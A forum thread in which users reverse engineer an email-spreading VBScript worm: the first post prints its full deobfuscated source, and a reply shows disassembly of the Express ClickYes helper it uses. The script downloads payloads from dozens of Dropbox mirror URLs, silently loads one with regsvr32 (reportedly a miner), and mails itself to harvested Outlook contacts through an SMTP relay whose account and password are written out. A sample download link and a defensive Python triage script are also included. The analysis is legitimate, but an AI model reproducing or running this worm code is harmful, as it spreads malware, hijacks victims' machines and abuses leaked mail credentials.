Reverse engineering a virus
lsvet1 ::
Today something unpleasant happened to an acquaintance of mine: she evidently opened some VB script somewhere and infected her computer with a virus. It would be nice to figure out what it does and how to remove it. The thing spreads via email and Facebook, so I was able to get hold of my own copy as well. The problem is that it is evidently new and AVs don't detect it yet, and it is built in a fairly complex way. So, it spreads via an obfuscated VB script (random name, e.g. oosdfk75.zip; inside is oosdfk75.vbs); the code, as far as I managed to deobfuscate it, is below.
As can be seen, the thing downloads three things from Dropbox: documents.zip, xml.zip and clickyes.dat. documents.zip is the obfuscated source code of the virus, which is sent on and spread to others via Facebook and email (I assume via the Outlook address list); xml.zip and clickyes.dat are, as far as I have managed to determine so far, executable files (.exe) just with a different extension, but I haven't yet managed to figure out what they do, so if anyone feels like it and has the time to quickly reverse engineer them, help would be very welcome. I'm attaching the zipped files, since they may soon be deleted from Dropbox - CAREFUL when opening http://www61.zippyshare.com/v/31759391/...
UPDATE:
Clickyes.exe is very probably this http://www.contextmagic.com/express-cli... and it lets the main program in xml.zip send mail without a prompt...
"Express ClickYes is a tiny program that runs in the system tray and automatically clicks the Yes button for the Outlook security prompt, that asks you to confirm mail sending from third party applications or access to Outlook's address book."
UPDATE2: apparently it's some type of bitcoin miner (xml.zip)...
Thanks for the help
On Error Resume Next
Randomize

Dim tmpDir: tmpDir = "C:\temp"
' random file name, e.g. 5-15 letters, a dot and a 3-letter "extension"
Dim tmpFileName: tmpFileName = getName(int(rnd * 10) + 5) & "." & getName(2)
Dim pepeSource
Dim selfLink

' Mirror lists: each download routine walks the comma-separated list until one URL answers HTTP 200
pepeSource = "http://dl.dropboxusercontent.com/s/rxkbtjtpvzgrra4/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/8w0ldbbf0ndb78l/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ubdlqx6leqy3gw8/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/h6znwxvjs3rpvw7/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/eclb44x6t01lxsg/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ywfb7lux4of25au/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/6xm9cw2dkmo0q0k/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/xoqbc490nurxeow/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ja2hb47rwkzqqo8/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/y8lpltcjxuf81n7/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/8zaselhbwkdw3w7/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/xfyakmoo7gzv4j3/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/bxlxjku6u6i5mqq/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/gs3eq8r00yn4of8/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/6e7xw9qrovheepd/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/073he87wsizsn14/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/z4jl4ckge68ly86/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/2v5auf9b4wh1sas/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/clw9swn6w7ez8yz/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/yc4ju3wap4y71va/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/l93ij60w4jsgj6e/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ll2ydaxt1qesxbg/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/h5fy4kinzcqpo0e/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/1dxzjip2h8ep2fl/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/98yoxgz9nh00lxp/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/r7ll4mze3xigpkb/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/da9mznunn0kz588/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/36gldtb1ngjhjg1/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/h3bt7tygbf91jsm/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/m26w3f17a8zc3tr/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/vntfj2zc6nygvv2/xml.zip?dl=1"
yesSource = "http://dl.dropboxusercontent.com/s/o0d1ce9toe9a9rq/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/f2h777xsqv8cepb/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/ui6zo977ttx7bqy/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/tsv6l172jqlt0tf/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/d9bt6hyvhjjwwkd/clickyes.dat?dl=1"
vbsSource = "http://dl.dropboxusercontent.com/s/uw92ooko73yincw/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/j7eiyij7wshwhoe/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/x2npx95tzmk724r/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/i0orsrnizec9fr0/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/liwvrveoh67qbnw/Documents.zip?dl=1"

createTmpDir()
' xml.zip is saved under the random name and loaded silently via regsvr32 /s (so it is a DLL, not a zip)
getPepe pepeSource, tmpDir & "\" & tmpFileName
pwnpwn("regsvr32 /s " & tmpDir & "\" & tmpFileName)
' clickyes.dat is Express ClickYes, which auto-confirms the Outlook security prompt used by spreadTheWord
getPepe yesSource, tmpDir & "\clickyes.exe"
pwnpwn(tmpDir & "\clickyes.exe")
WScript.Sleep(3000)
' the first reachable Documents.zip mirror is what gets mailed to the victim's contacts
selfLink = getSelfLink(vbsSource)
if selfLink = "" then
Else
    spreadTheWord "kate.lisbon" & Int(rnd * 1990) + 1970 & "@yahoo.de", selfLink, "Documents.zip", "ALL"
End If

' run an arbitrary command line via WScript.Shell
Sub pwnpwn(what)
    Set oShell = WScript.CreateObject("WSCript.shell")
    oShell.run what
End Sub

Sub createTmpDir()
    Set oFSO = CreateObject("Scripting.FileSystemObject")
    If Not oFSO.FolderExists(tmpDir) Then
        Set objFolder = oFSO.CreateFolder(tmpDir)
    End If
End Sub

' return the first mirror that still answers 200 (empty string if none)
Function getSelfLink(source)
    source = Split(source, ",")
    for each link in source
        Dim xHttp: Set xHttp = createobject("microsoft.xmlhttp")
        Dim bStrm: Set bStrm = createobject("adodb.stream")
        xHttp.Open "GET", link, False
        xHttp.Send
        If(xHttp.Status = 200) then
            getSelfLink = link
            Exit Function
        End If
    Next
End Function

' download the first reachable mirror to destination, then sleep 3-13 s
Sub getPepe(source, destination)
    source = Split(source, ",")
    for each link in source
        Dim xHttp: Set xHttp = createobject("microsoft.xmlhttp")
        Dim bStrm: Set bStrm = createobject("adodb.stream")
        xHttp.Open "GET", link, False
        xHttp.Send
        If(xHttp.Status = 200) then
            With bStrm
                .type = 1
                .open
                .write xHttp.responseBody
                .savetofile destination, 2
            End With
            For a = 0 to int(rnd * 10) + 3
                WScript.Sleep(1000)
            Next
            Exit Sub
        End If
    Next
End Sub

' random string of letters (numOfChars + 1 characters, since the loop is 0..numOfChars inclusive)
Function getName(numOfChars)
    Dim currentString
    Dim charset
    charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    For i = 0 to numOfChars
        currentString = currentString & Mid(charset, int(Len(charset)*rnd+1), 1)
    Next
    getName = currentString
End Function

' send mail through a hard-coded authenticated SMTP relay using CDO (no Outlook prompt involved here)
Sub SendMessage(MailFrom, MailTo, Subject, Message)
    Dim ObjSendMail
    Set ObjSendMail = CreateObject("CDO.Message")
    With ObjSendMail.Configuration.Fields
        .Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
        .Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "mailgate.otenet.gr"
        .Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 587
        .Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False
        .Item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60
        .Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
        .Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "nastia26@otenet.gr"
        .Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "nat1978#"
        .Update
    End With
    ObjSendMail.To = MailTo
    ObjSendMail.Subject = Subject
    ObjSendMail.From = MailFrom
    ObjSendMail.HTMLBody = Message
    ObjSendMail.Send
    Set ObjSendMail = Nothing
End Sub

' "compare" is never assigned by the callers, so Filter() runs with the default (binary) comparison
Function ElementInArray(aMyArray, strLookingFor, compare)
    ElementInArray = (UBound(Filter(aMyArray, strLookingFor, True, compare)) > - 1)
End Function

' Harvest addresses from the Outlook contacts folder and inbox senders, mail each one once.
' Note: the URL parameter is never used in the message body, and the Email2/Email3/inbox
' branches still pass objContact.Email1Address as the recipient (kept exactly as found).
Sub spreadTheWord(SenderEmail, URL, DOCNAME, mailFilter)
    Const olFolderContacts = 10
    isThere = Array()
    Set objOutlook = CreateObject("Outlook.Application")
    Set objNamespace = objOutlook.GetNamespace("MAPI")
    Set colContacts = objNamespace.GetDefaultFolder(olFolderContacts).Items
    For Each objContact In colContacts
        If objContact.Email1Address = "" Then
        Else
            If mailFilter <> "ALL" And InStr(objContact.Email1Address, mailFilter) Then
                If ElementInArray(isThere, objContact.Email1Address, compare) Then
                Else
                    SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you."
                    ReDim Preserve isThere(UBound(isThere) + 1)
                    isThere(UBound(isThere)) = objContact.Email1Address
                End If
            ElseIf mailFilter = "ALL" Then
                If ElementInArray(isThere, objContact.Email1Address, compare) Then
                Else
                    SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you."
                    ReDim Preserve isThere(UBound(isThere) + 1)
                    isThere(UBound(isThere)) = objContact.Email1Address
                End If
            End If
        End If
        If objContact.Email2Address = "" Then
        Else
            If mailFilter <> "ALL" And InStr(objContact.Email2Address, mailFilter) Then
                If ElementInArray(isThere, objContact.Email2Address, compare) Then
                Else
                    SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you."
                    ReDim Preserve isThere(UBound(isThere) + 1)
                    isThere(UBound(isThere)) = objContact.Email2Address
                End If
            ElseIf mailFilter = "ALL" Then
                If ElementInArray(isThere, objContact.Email2Address, compare) Then
                Else
                    SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you."
                    ReDim Preserve isThere(UBound(isThere) + 1)
                    isThere(UBound(isThere)) = objContact.Email2Address
                End If
            End If
        End If
        If objContact.Email3Address = "" Then
        Else
            If mailFilter <> "ALL" And InStr(objContact.Email3Address, mailFilter) Then
                If ElementInArray(isThere, objContact.Email3Address, compare) Then
                Else
                    SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you."
                    ReDim Preserve isThere(UBound(isThere) + 1)
                    isThere(UBound(isThere)) = objContact.Email3Address
                End If
            ElseIf mailFilter = "ALL" Then
                If ElementInArray(isThere, objContact.Email3Address, compare) Then
                Else
                    SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you."
                    ReDim Preserve isThere(UBound(isThere) + 1)
                    isThere(UBound(isThere)) = objContact.Email3Address
                End If
            End If
        End If
    Next
    ' second pass: senders of everything in the inbox
    Const olFolderInbox = 6
    Set objFolder = objNamespace.GetDefaultFolder(olFolderInbox)
    Set colItems = objFolder.Items
    For Each objItem in colItems
        If mailFilter <> "ALL" And InStr(objItem.SenderEmailAddress, mailFilter) Then
            If ElementInArray(isThere, objItem.SenderEmailAddress, compare) Then
            Else
                SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you."
                ReDim Preserve isThere(UBound(isThere) + 1)
                isThere(UBound(isThere)) = objItem.SenderEmailAddress
            End If
        ElseIf mailFilter = "ALL" Then
            If ElementInArray(isThere, objItem.SenderEmailAddress, compare) Then
            Else
                SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you."
                ReDim Preserve isThere(UBound(isThere) + 1)
                isThere(UBound(isThere)) = objItem.SenderEmailAddress
            End If
        End If
    Next
End Sub
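A small static triage helper for a deobfuscated dropper of the kind posted above. This is an added example, not code from the thread: it pulls out the mirror URL lists, the COM objects the script creates and the behaviours that mark it as a mail-spreading dropper (silent regsvr32 load, CDO mail with embedded credentials, Outlook contact and inbox harvesting). The SAMPLE text is a constructed, shortened stand-in with placeholder hosts and a redacted password, not the live links from the post.

```python
"""Static triage of a deobfuscated VBScript dropper (added example, not the thread's code)."""
import re
from urllib.parse import urlsplit

# Behaviours seen in the posted dropper, keyed by a regex over the script text.
BEHAVIOUR_PATTERNS = {
    "error_suppression": r"^\s*On Error Resume Next",
    "silent_regsvr32_load": r"regsvr32\s+/s\b",
    "cdo_smtp_with_creds": r"cdo/configuration/sendpassword",
    "outlook_contact_harvest": r"GetDefaultFolder\(olFolderContacts\)",
    "outlook_inbox_harvest": r"GetDefaultFolder\(olFolderInbox\)",
}

def triage(script: str) -> dict:
    """Return URL lists by variable, unique hosts, COM progids and matched behaviours."""
    urls = {}
    # VAR = "http://a,http://b,..."  (a comma-joined list the script later feeds to Split)
    for var, blob in re.findall(r'(\w+)\s*=\s*"(https?://[^"]+)"', script):
        urls[var] = [u for u in blob.split(",") if u.startswith("http")]
    hosts = sorted({urlsplit(u).netloc for lst in urls.values() for u in lst})
    progids = sorted({p.lower() for p in re.findall(r'CreateObject\("([^"]+)"\)', script, re.I)})
    behaviours = sorted(name for name, pat in BEHAVIOUR_PATTERNS.items()
                        if re.search(pat, script, re.I | re.M))
    return {"urls": urls, "hosts": hosts, "progids": progids, "behaviours": behaviours}

# Constructed sample: the shape of the posted script, placeholder hosts, credential redacted.
SAMPLE = r'''On Error Resume Next
pepeSource = "http://files.example.invalid/s/aaaa/xml.zip?dl=1,http://files.example.invalid/s/bbbb/xml.zip?dl=1"
yesSource = "http://mirror.example.invalid/s/cccc/clickyes.dat?dl=1"
pwnpwn("regsvr32 /s " & tmpDir & "\" & tmpFileName)
Set oShell = WScript.CreateObject("WSCript.shell")
Set ObjSendMail = CreateObject("CDO.Message")
.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "REDACTED"
Set objOutlook = CreateObject("Outlook.Application")
Set colContacts = objNamespace.GetDefaultFolder(olFolderContacts).Items
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

Run it over the real deobfuscated script to get the host list for blocking and the behaviour flags for a detection rule; the inbox pass shows up only when the second Outlook loop is present.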
sas084 ::
I quickly looked over clickyes.dat and it looks like it's Express ClickYes 1.2 (the exe isn't packed/obfuscated, but I didn't check the hashes against the original, so I can't say whether it has been modified or not).
Symantec detects xml.zip as Suspicious.AD. I'll look at it in more detail when I have time.
CODE:00404CD3 push    0
CODE:00404CD5 push    offset unk_407738
CODE:00404CDA push    0
CODE:00404CDC push    30h
CODE:00404CDE call    SystemParametersInfoA
CODE:00404CE3 push    0C80000h
CODE:00404CE8 mov     eax, ds:dword_407740
CODE:00404CED sub     eax, 0EDh
CODE:00404CF2 push    eax
CODE:00404CF3 mov     eax, ds:dword_407744
CODE:00404CF8 sub     eax, 78h
CODE:00404CFB push    eax
CODE:00404CFC push    0EBh
CODE:00404D01 push    76h
CODE:00404D03 push    0
CODE:00404D05 push    0
CODE:00404D07 mov     eax, ds:hModule
CODE:00404D0C push    eax
CODE:00404D0D push    0
CODE:00404D0F mov     ecx, offset aExpressClick_0 ; "Express ClickYes 1.2"
CODE:00404D14 mov     edx, offset aExclickyes_wnd ; "EXCLICKYES_WND"
CODE:00404D19 mov     eax, 100h
CODE:00404D1E call    sub_403D48
CODE:00404D23 mov     ds:hWnd, eax
CODE:00404D28 push    5Ah
CODE:00404D2A push    3Eh
CODE:00404D2C push    3Ch
CODE:00404D2E push    14h
CODE:00404D30 mov     eax, ds:hWnd
CODE:00404D35 push    eax
CODE:00404D36 push    0
CODE:00404D38 mov     eax, ds:hModule
CODE:00404D3D push    eax
CODE:00404D3E push    0
CODE:00404D40 mov     edx, offset aOk ; "OK"
CODE:00404D45 mov     eax, offset aButton_0 ; "Button"
CODE:00404D4A mov     ecx, 50001000h
CODE:00404D4F call    sub_403DA0